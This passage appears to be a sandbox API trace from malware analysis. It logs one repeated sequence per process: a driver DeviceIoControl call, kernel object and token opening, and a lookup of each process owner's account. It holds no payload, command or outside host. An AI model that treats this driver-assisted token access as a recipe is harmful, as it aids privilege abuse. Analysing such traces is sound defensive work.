lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0265.736] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a00c840, HandleInformation=0x0) returned 0x0 [0265.736] ObOpenObjectByPointer (in: Object=0xffffe0006a00c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0265.736] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481d5 [0265.736] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a293640 | out: TokenHandle=0xffffe0006a293640*=0x1a8) returned 0x0 [0265.736] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0265.736] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0265.736] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0265.737] CloseHandle (hObject=0x1a8) returned 1 [0265.737] CloseHandle (hObject=0x180) returned 1 [0265.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa1c) returned 0x180 [0265.742] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0265.742] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a0e0080, HandleInformation=0x0) returned 0x0 [0265.742] ObOpenObjectByPointer (in: Object=0xffffe0006a0e0080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0265.742] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x600df [0265.742] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a293640 | out: TokenHandle=0xffffe0006a293640*=0x1a8) returned 0x0 [0265.742] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0265.742] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0265.742] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0265.743] CloseHandle (hObject=0x1a8) returned 1 [0265.743] CloseHandle (hObject=0x180) returned 1 [0267.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1fc) returned 0x180 [0267.258] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.258] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a06c840, HandleInformation=0x0) returned 0x0 [0267.258] ObOpenObjectByPointer (in: Object=0xffffe0006a06c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.258] ObfDereferenceObject (Object=0xffffe0006a06c840) returned 0x2fff8 [0267.258] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.258] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.258] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.258] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.259] CloseHandle (hObject=0x1a8) returned 1 [0267.259] CloseHandle (hObject=0x180) returned 1 [0267.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x328) returned 0x180 [0267.260] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.260] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006934d080, HandleInformation=0x0) returned 0x0 [0267.260] ObOpenObjectByPointer (in: Object=0xffffe0006934d080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.260] ObfDereferenceObject (Object=0xffffe0006934d080) returned 0x2fff8 [0267.260] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.260] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.260] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.260] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.261] CloseHandle (hObject=0x1a8) returned 1 [0267.261] CloseHandle (hObject=0x180) returned 1 [0267.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x404) returned 0x180 [0267.261] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.261] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000693a45c0, HandleInformation=0x0) returned 0x0 [0267.261] ObOpenObjectByPointer (in: Object=0xffffe000693a45c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.261] ObfDereferenceObject (Object=0xffffe000693a45c0) returned 0x2fff8 [0267.261] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.262] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.262] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.262] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.263] CloseHandle (hObject=0x1a8) returned 1 [0267.263] CloseHandle (hObject=0x180) returned 1 [0267.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x520) returned 0x180 [0267.264] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.264] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000693a1640, HandleInformation=0x0) returned 0x0 [0267.264] ObOpenObjectByPointer (in: Object=0xffffe000693a1640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.264] ObfDereferenceObject (Object=0xffffe000693a1640) returned 0x2fff8 [0267.264] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.264] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.264] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.264] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.265] CloseHandle (hObject=0x1a8) returned 1 [0267.265] CloseHandle (hObject=0x180) returned 1 [0267.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa80) returned 0x180 [0267.265] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.265] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006994c540, HandleInformation=0x0) returned 0x0 [0267.266] ObOpenObjectByPointer (in: Object=0xffffe0006994c540, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.266] ObfDereferenceObject (Object=0xffffe0006994c540) returned 0x2fff8 [0267.266] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.266] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.266] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.266] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.267] CloseHandle (hObject=0x1a8) returned 1 [0267.267] CloseHandle (hObject=0x180) returned 1 [0267.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x180 [0267.267] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.267] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069360080, HandleInformation=0x0) returned 0x0 [0267.267] ObOpenObjectByPointer (in: Object=0xffffe00069360080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.267] ObfDereferenceObject (Object=0xffffe00069360080) returned 0x2fff8 [0267.267] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.267] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.267] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.267] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.268] CloseHandle (hObject=0x1a8) returned 1 [0267.268] CloseHandle (hObject=0x180) returned 1 [0267.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2f0) returned 0x180 [0267.269] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.269] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000691ca840, HandleInformation=0x0) returned 0x0 [0267.269] ObOpenObjectByPointer (in: Object=0xffffe000691ca840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.269] ObfDereferenceObject (Object=0xffffe000691ca840) returned 0x2fff8 [0267.269] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.269] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.269] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.269] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.271] CloseHandle (hObject=0x1a8) returned 1 [0267.271] CloseHandle (hObject=0x180) returned 1 [0267.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x180 [0267.271] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.271] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000691d3840, HandleInformation=0x0) returned 0x0 [0267.271] ObOpenObjectByPointer (in: Object=0xffffe000691d3840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.271] ObfDereferenceObject (Object=0xffffe000691d3840) returned 0x2fff8 [0267.271] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.271] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.271] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.272] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.273] CloseHandle (hObject=0x1a8) returned 1 [0267.273] CloseHandle (hObject=0x180) returned 1 [0267.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb3c) returned 0x180 [0267.273] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.273] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00079221840, HandleInformation=0x0) returned 0x0 [0267.273] ObOpenObjectByPointer (in: Object=0xffffe00079221840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.273] ObfDereferenceObject (Object=0xffffe00079221840) returned 0x2fff8 [0267.273] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.273] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.273] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.273] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.275] CloseHandle (hObject=0x1a8) returned 1 [0267.275] CloseHandle (hObject=0x180) returned 1 [0267.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0x180 [0267.275] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.275] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000691fd180, HandleInformation=0x0) returned 0x0 [0267.275] ObOpenObjectByPointer (in: Object=0xffffe000691fd180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.275] ObfDereferenceObject (Object=0xffffe000691fd180) returned 0x2fff8 [0267.275] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.275] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.275] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.275] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.277] CloseHandle (hObject=0x1a8) returned 1 [0267.277] CloseHandle (hObject=0x180) returned 1 [0267.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x380) returned 0x180 [0267.277] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.277] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069095840, HandleInformation=0x0) returned 0x0 [0267.278] ObOpenObjectByPointer (in: Object=0xffffe00069095840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.278] ObfDereferenceObject (Object=0xffffe00069095840) returned 0x2fff8 [0267.278] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a6e1a80 | out: TokenHandle=0xffffe0006a6e1a80*=0x1a8) returned 0x0 [0267.278] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.278] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.278] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.660] CloseHandle (hObject=0x1a8) returned 1 [0267.660] CloseHandle (hObject=0x180) returned 1 [0267.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0x180 